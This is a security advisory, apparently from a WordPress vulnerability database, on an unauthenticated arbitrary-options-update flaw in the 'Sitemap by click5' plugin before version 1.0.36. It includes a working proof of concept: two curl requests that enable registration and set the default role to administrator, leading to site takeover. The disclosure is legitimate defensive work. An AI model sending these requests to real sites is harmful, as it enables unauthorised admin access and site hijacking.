WordPress Plugin Vulnerabilities

Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update

Description

The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

Proof of Concept

Allow user registrations:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
    -H 'Content-Type: application/json' \
    --data '{"users_can_register": 1}'

Set the default user role to administrator:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
    -H 'Content-Type: application/json' \
    --data '{"default_role":"administrator"}'

Affects Plugins

Fixed in 1.0.36

References

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-04-11 (about 2 years ago)
Added
2022-04-11 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other